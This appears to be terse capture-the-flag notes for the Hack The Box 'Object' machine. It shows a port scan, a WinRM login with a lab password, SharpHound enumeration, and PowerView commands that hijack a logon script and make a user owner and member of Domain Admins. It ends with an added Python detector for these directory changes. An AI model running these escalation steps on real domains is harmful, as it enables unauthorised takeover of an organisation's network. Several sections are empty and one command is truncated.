htb-object-nl

Object

NMAP

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http    Jetty 9.4.43.v20210629
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 80 (HTTP)

PORT 8080 (HTTP)

cmd.exe /c powershell.exe -c Get-NetFirewallRule -Action Block -Enabled True -Direction Outbound

Foothold

┌──(puck㉿kali)-[~/htb/object]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434


Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> $env:USERDNSDOMAIN
object.local
*Evil-WinRM* PS C:\Users\oliver\Documents> mkdir puck


Directory: C:\Users\oliver\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2024 8:54 AM puck


*Evil-WinRM* PS C:\Users\oliver\Documents> cd puck
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> upload SharpHound.exe

Info: Uploading /home/puck/htb/object/SharpHound.exe to C:\Users\oliver\Documents\puck\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ./SharpHound.exe all
2024-03-23T08:55:50.0837796-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T08:55:50.2243965-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.2556464-07:00|INFORMATION|Initializing SharpHound at 8:55 AM on 3/23/2024
2024-03-23T08:55:50.4119095-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-03-23T08:55:50.4431626-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.5993967-07:00|INFORMATION|Beginning LDAP search for object.local
2024-03-23T08:55:50.6462777-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T08:55:50.6618979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T08:56:21.3267021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-03-23T08:56:36.5571557-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T08:56:36.5884055-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Status: 92 objects finished (+92 2)/s -- Using 44 MB RAM
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Enumeration finished in 00:00:46.2025467
2024-03-23T08:56:36.8696534-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
52 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T08:56:36.8852775-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ls


Directory: C:\Users\oliver\Documents\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 8:56 AM 11437 20240323085636_BloodHound.zip
-a---- 3/23/2024 8:56 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 3/23/2024 8:55 AM 1046528 SharpHound.exe


*Evil-WinRM* PS C:\Users\oliver\Documents\puck> download 20240323085636_BloodHound.zip

Info: Downloading C:\Users\oliver\Documents\puck\20240323085636_BloodHound.zip to 20240323085636_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck>


Privilege Escalation (Smith)

Privilege Escalation (Maria)

Set-DomainObject -Identity maria -SET @{scriptpath="C:\ProgramData\logonscript.ps1"}
dir C:\Users\maria\Desktop > C:\ProgramData\dir_result.txt
copy C:\Users\maria\Desktop\Engines.xls C:\ProgramData\
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights Al
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
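
A defender's view of the directory changes above, as an added example that is not part of the original write-up: it scans Security events exported as XML for a scriptPath write (event 5136), a security-descriptor change on Domain Admins (5136), and a member added to that group (4728). It assumes Directory Service Changes auditing is enabled with a suitable SACL; the sample events, DNs and actor names are constructed, and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
GROUP = "Domain Admins"
MODIFIED, MEMBER_ADDED, VALUE_ADDED = 5136, 4728, "%%14674"  # event ids; "value added" op code

def parse(event_xml):
    """Return (event_id, {Data Name: text}) for one Security event in XML form."""
    root = ET.fromstring(event_xml)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    return event_id, data

def classify(event_xml):
    """Return a finding string for one event, or None if it is not of interest."""
    event_id, d = parse(event_xml)
    actor, dn = d.get("SubjectUserName", "?"), d.get("ObjectDN", "")
    attr = d.get("AttributeLDAPDisplayName", "").lower()
    if event_id == MODIFIED and attr == "scriptpath" and d.get("OperationType") == VALUE_ADDED:
        return f"logon script set on {dn} by {actor}: {d.get('AttributeValue')}"
    if event_id == MODIFIED and attr == "ntsecuritydescriptor" \
            and dn.lower().startswith(f"cn={GROUP.lower()},"):
        return f"owner/ACL of {GROUP} changed by {actor}"
    if event_id == MEMBER_ADDED and d.get("TargetUserName", "").lower() == GROUP.lower():
        return f"{d.get('MemberName')} added to {GROUP} by {actor}"
    return None

def findings(events):
    return [f for f in map(classify, events) if f]

def sample_event(event_id, **data):
    """Build a constructed sample event; not captured from a real host."""
    rows = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{rows}</EventData></Event>")

MARIA = "CN=maria,CN=Users,DC=object,DC=local"  # constructed DN
SAMPLES = [
    sample_event(5136, SubjectUserName="smith", ObjectDN=MARIA, OperationType="%%14674",
                 AttributeLDAPDisplayName="scriptPath",
                 AttributeValue=r"C:\ProgramData\logonscript.ps1"),
    sample_event(5136, SubjectUserName="maria", AttributeLDAPDisplayName="nTSecurityDescriptor",
                 ObjectDN="CN=Domain Admins,CN=Users,DC=object,DC=local"),
    sample_event(4728, SubjectUserName="maria", MemberName=MARIA, TargetUserName=GROUP),
    sample_event(5136, ObjectDN=MARIA, AttributeLDAPDisplayName="description"),  # benign edit
]

if __name__ == "__main__":
    print("\n".join(findings(SAMPLES)))
```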
